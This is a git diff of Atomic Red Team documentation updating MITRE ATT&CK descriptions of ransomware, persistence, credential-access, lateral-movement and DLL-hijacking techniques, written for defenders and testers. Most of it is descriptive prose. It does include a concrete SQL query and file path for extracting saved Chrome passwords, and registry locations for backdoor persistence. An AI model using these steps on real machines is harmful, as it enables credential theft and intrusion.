+2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1486)
Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) -To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)
+To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) + +In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) ## Atomic Tests diff --git a/atomics/T1489/T1489.md b/atomics/T1489/T1489.md index 7ff35bce..c3d686e0 100644 --- a/atomics/T1489/T1489.md +++ b/atomics/T1489/T1489.md @@ -1,8 +1,8 @@ # T1489 - Service Stop ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1489) -
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) +
Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) -Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
+Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)
## Atomic Tests diff --git a/atomics/T1496/T1496.md b/atomics/T1496/T1496.md index d4882c10..39645569 100644 --- a/atomics/T1496/T1496.md +++ b/atomics/T1496/T1496.md @@ -2,7 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1496)
Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. -One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.
+One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) + +Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) ## Atomic Tests diff --git a/atomics/T1497.001/T1497.001.md b/atomics/T1497.001/T1497.001.md index 763c7a77..055376e4 100644 --- a/atomics/T1497.001/T1497.001.md +++ b/atomics/T1497.001/T1497.001.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1497/001)
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. -Specific checks may will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. +Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. -Checks could include generic system properties such as uptime and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. +Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. diff --git a/atomics/T1546.004/T1546.004.md b/atomics/T1546.004/T1546.004.md index e7f9711c..e45a0307 100644 --- a/atomics/T1546.004/T1546.004.md +++ b/atomics/T1546.004/T1546.004.md @@ -1,12 +1,10 @@ -# T1546.004 - .bash_profile and .bashrc +# T1546.004 - Unix Shell Configuration Modification ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/004) -
Adversaries may establish persistence by executing malicious content triggered by a user’s shell. ~/.bash_profile and ~/.bashrc are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. +
Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. -~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), the ~/.bash_profile script is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, the ~/.bashrc script is executed. This allows users more fine-grained control over when they want certain commands executed. These shell scripts are meant to be written to by the local user to configure their own environment. +Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. -The macOS Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc. - -Adversaries may abuse these shell scripts by inserting arbitrary shell commands that may be used to execute other binaries to gain persistence. Every time the user logs in or opens a new shell, the modified ~/.bash_profile and/or ~/.bashrc scripts will be executed.(Citation: amnesia malware)
+For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.
## Atomic Tests diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index 37cc8967..d0d2cd8b 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md @@ -1,6 +1,6 @@ # T1546.010 - AppInit DLLs ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/010) -
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Endgame Process Injection July 2017) +
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md index cb83a0d9..d04659d0 100644 --- a/atomics/T1546.011/T1546.011.md +++ b/atomics/T1546.011/T1546.011.md @@ -1,6 +1,6 @@ # T1546.011 - Application Shimming ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/011) -
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) +
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. diff --git a/atomics/T1546.012/T1546.012.md b/atomics/T1546.012/T1546.012.md index df5c047b..0387c735 100644 --- a/atomics/T1546.012/T1546.012.md +++ b/atomics/T1546.012/T1546.012.md @@ -8,7 +8,7 @@ IFEOs can also enable an arbitrary monitor program to be launched when a specifi Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014) -Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. +Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation. Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)
diff --git a/atomics/T1547.001/T1547.001.md b/atomics/T1547.001/T1547.001.md index 510bef2f..3df5043a 100644 --- a/atomics/T1547.001/T1547.001.md +++ b/atomics/T1547.001/T1547.001.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/001)
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level. -Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. +Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The following run keys are created by default on Windows systems: diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md index a7e4fa19..cff18b2b 100644 --- a/atomics/T1547.006/T1547.006.md +++ b/atomics/T1547.006/T1547.006.md @@ -4,7 +4,7 @@ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) -Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. +Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
diff --git a/atomics/T1550.002/T1550.002.md b/atomics/T1550.002/T1550.002.md index 221e6340..3b5dc5f3 100644 --- a/atomics/T1550.002/T1550.002.md +++ b/atomics/T1550.002/T1550.002.md @@ -1,8 +1,10 @@ # T1550.002 - Pass the Hash ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1550/002) -
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. +
Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. -Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.(Citation: NSA Spotting)
+When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. + +Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)
## Atomic Tests diff --git a/atomics/T1550.003/T1550.003.md b/atomics/T1550.003/T1550.003.md index e9f49896..8c4fc94d 100644 --- a/atomics/T1550.003/T1550.003.md +++ b/atomics/T1550.003/T1550.003.md @@ -2,11 +2,13 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1550/003)
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system. -In this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) +When preforming PtT, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.(Citation: ADSecurity AD Kerberos Attacks)(Citation: GentilKiwi Pass the Ticket) -[Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) +A [Silver Ticket](https://attack.mitre.org/techniques/T1558/002) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).(Citation: ADSecurity AD Kerberos Attacks) -[Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014)
+A [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory.(Citation: Campbell 2014) + +Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://attack.mitre.org/techniques/T1550/002)) while also using the password hash to create a valid Kerberos ticket.(Citation: Stealthbits Overpass-the-Hash)
## Atomic Tests diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md index 1bd6f261..300e9199 100644 --- a/atomics/T1552.001/T1552.001.md +++ b/atomics/T1552.001/T1552.001.md @@ -4,7 +4,7 @@ It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) -In cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. (Citation: Specter Ops - Cloud Credential Storage)
+In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
## Atomic Tests diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index 9f654a47..c246dec0 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -2,9 +2,9 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1555/003)
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers. -For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData ‎April 2018) +For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018) -Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) +Adversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004). Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016) diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index a3822ffc..349306a5 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -1,8 +1,8 @@ # T1566.001 - Spearphishing Attachment ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1566/001) -
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. +
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source. -There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
+There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
## Atomic Tests diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index 76e19e49..beaef109 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -1,13 +1,12 @@ # T1574.001 - DLL Search Order Hijacking ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/001) -
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. +
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. -There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) +There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) -Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) +Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) -If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. -Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
+If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
## Atomic Tests diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index cfe6cca2..a5c25e44 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -1,10 +1,8 @@ # T1574.002 - DLL Side-Loading ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1574/002) -
Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. +
